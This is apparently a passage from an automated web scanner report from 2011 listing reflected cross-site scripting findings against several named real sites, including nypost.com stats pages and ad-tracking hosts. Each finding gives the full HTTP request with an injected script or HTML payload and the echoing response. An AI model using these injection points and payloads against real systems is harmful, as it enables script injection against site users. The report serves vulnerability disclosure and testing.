The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e5957<a>b4dfccdf814 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&e5957<a>b4dfccdf814=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:23 GMT
Content-Length: 5637
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&e5957<a>b4dfccdf814=1/ErrorInfoService.asmx" />
...[SNIP]...

1.98. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ErrorInfoService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ErrorInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 7211b<a>d13bd9d5899 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337997211b<a>d13bd9d5899 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:21 GMT
Content-Length: 5625
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337997211b<a>d13bd9d5899/ErrorInfoService.asmx" />
...[SNIP]...

1.99. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/PlaylistInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c107a<a>e030cdb19c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&c107a<a>e030cdb19c8=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:54:36 GMT
Connection: close
Content-Length: 27398

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&c107a<a>e030cdb19c8=1/PlaylistInfoService.asmx" />
...[SNIP]...

1.100. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/PlaylistInfoService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/PlaylistInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 805d1<a>9442a9480e1 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799805d1<a>9442a9480e1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:54:34 GMT
Connection: close
Content-Length: 27386

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799805d1<a>9442a9480e1/PlaylistInfoService.asmx" />
...[SNIP]...

1.101. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RSSService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RSSService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6158d<a>fef6ea25a2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&6158d<a>fef6ea25a2d=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:23 GMT
Content-Length: 8814
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&6158d<a>fef6ea25a2d=1/RSSService.asmx" />
...[SNIP]...

1.102. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RSSService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RSSService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload ddf95<a>fbeebb8e4ab was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799ddf95<a>fbeebb8e4ab HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:20 GMT
Content-Length: 8802
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799ddf95<a>fbeebb8e4ab/RSSService.asmx" />
...[SNIP]...

1.103. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RatingService.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RatingService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 41784<a>c99c3d4327e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&41784<a>c99c3d4327e=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:17 GMT
Content-Length: 5534
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&41784<a>c99c3d4327e=1/RatingService.asmx" />
...[SNIP]...

1.104. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RatingService.aspx [siteid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RatingService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 95d07<a>a64db502d4d was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-23379995d07<a>a64db502d4d HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:16 GMT
Content-Length: 5522
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-23379995d07<a>a64db502d4d/RatingService.asmx" />
...[SNIP]...

1.105. http://r.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6594"><script>alert(1)</script>787c1397da1 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=a6594"><script>alert(1)</script>787c1397da1&sp=y&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/below-fold?t=1297130902623&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 07-Aug-2011 02:09:00 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:08:59 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=7475527706804467806&fpid=a6594"><script>alert(1)</script>787c1397da1&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.106. http://r.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2604a"><script>alert(1)</script>f2f82733516 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=2604a"><script>alert(1)</script>f2f82733516&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/below-fold?t=1297130902623&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 07-Aug-2011 02:09:01 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:09:00 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=3889232801873965617&fpid=4&nu=n&t=&sp=2604a"><script>alert(1)</script>f2f82733516&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.107. http://stats.nypost.com/fb/scoreboard.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.nypost.com
Path:   /fb/scoreboard.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ad94"><script>alert(1)</script>e2be14c4e6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fb/scoreboard.asp?2ad94"><script>alert(1)</script>e2be14c4e6c=1 HTTP/1.1
Host: stats.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=10
Date: Tue, 08 Feb 2011 02:34:42 GMT
Content-Length: 29771
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>S
...[SNIP]...
<META content="60;/fb/scoreboard.asp?2ad94"><script>alert(1)</script>e2be14c4e6c=1&amp;meta=true" http-equiv="Refresh">
...[SNIP]...

1.108. http://stats.nypost.com/mlb/scoreboard.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.nypost.com
Path:   /mlb/scoreboard.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 125f5"><script>alert(1)</script>5d9a54190c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mlb/scoreboard.asp?125f5"><script>alert(1)</script>5d9a54190c8=1 HTTP/1.1
Host: stats.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Cache-Control: private, max-age=10
Date: Tue, 08 Feb 2011 02:34:43 GMT
Content-Length: 29152
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>S
...[SNIP]...
<META content="60;/mlb/scoreboard.asp?125f5"><script>alert(1)</script>5d9a54190c8=1&amp;meta=true" http-equiv="Refresh">
...[SNIP]...

1.109. http://stats.nypost.com/nba/scoreboard.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.nypost.com
Path:   /nba/scoreboard.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2d26"><script>alert(1)</script>cf0c3971885 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nba/scoreboard.asp?d2d26"><script>alert(1)</script>cf0c3971885=1 HTTP/1.1
Host: stats.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Cache-Control: private, max-age=10
Date: Tue, 08 Feb 2011 02:34:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>S
...[SNIP]...
<META content="60;/nba/scoreboard.asp?d2d26"><script>alert(1)</script>cf0c3971885=1&meta=true" http-equiv="Refresh">
...[SNIP]...

1.110. http://stats.nypost.com/nhl/scoreboard.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.nypost.com
Path:   /nhl/scoreboard.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc282"><script>alert(1)</script>a88736d6b0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nhl/scoreboard.asp?bc282"><script>alert(1)</script>a88736d6b0d=1 HTTP/1.1
Host: stats.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Cache-Control: private, max-age=10
Date: Tue, 08 Feb 2011 02:34:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>S
...[SNIP]...
<META content="60;/nhl/scoreboard.asp?bc282"><script>alert(1)</script>a88736d6b0d=1&meta=true" http-equiv="Refresh">
...[SNIP]...

1.111. http://vmgtrk.com/tracking202/static/landing.php [lpip parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vmgtrk.com
Path:   /tracking202/static/landing.php

Issue detail

The value of the lpip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dc80'%3balert(1)//b154865b622 was submitted in the lpip parameter. This input was echoed as 7dc80';alert(1)//b154865b622 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tracking202/static/landing.php?lpip=72467dc80'%3balert(1)//b154865b622 HTTP/1.1
Host: vmgtrk.com
Proxy-Connection: keep-alive
Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:06:54 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 3176

function t202Init(){
   //this grabs the t202kw, but if they set a forced kw, this will be replaced
   
   if (readCookie('t202forcedkw')) {
       var t202kw = readCookie('t202forcedkw');
   } else {
       var t202kw = t202GetVar('t202kw');
   }

   var lpip = '72467dc80';alert(1)//b154865b622';
   var t202id = t202GetVar('t202id');
   var OVRAW = t202GetVar('OVRAW');
   var OVKEY = t202GetVar('OVKEY');
   var OVMTC = t202GetVar('OVMTC');
   var c1 = t202GetVar('c1');
   var c2 = t202GetVar('c2');
   var
...[SNIP]...

1.112. http://vmgtrk.com/tracking202/static/landing.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vmgtrk.com
Path:   /tracking202/static/landing.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1483e'%3balert(1)//07436e66004 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1483e';alert(1)//07436e66004 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tracking202/static/landing.php?lpip=/1483e'%3balert(1)//07436e660047246 HTTP/1.1
Host: vmgtrk.com
Proxy-Connection: keep-alive
Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:06:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 3177

function t202Init(){
   //this grabs the t202kw, but if they set a forced kw, this will be replaced
   
   if (readCookie('t202forcedkw')) {
       var t202kw = readCookie('t202forcedkw');
   } else {
       var t202kw = t202GetVar('t202kw');
   }

   var lpip = '/1483e';alert(1)//07436e660047246';
   var t202id = t202GetVar('t202id');
   var OVRAW = t202GetVar('OVRAW');
   var OVKEY = t202GetVar('OVKEY');
   var OVMTC = t202GetVar('OVMTC');
   var c1 = t202GetVar('c1');
   var c2 = t202GetVar('c2');

...[SNIP]...

1.113. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

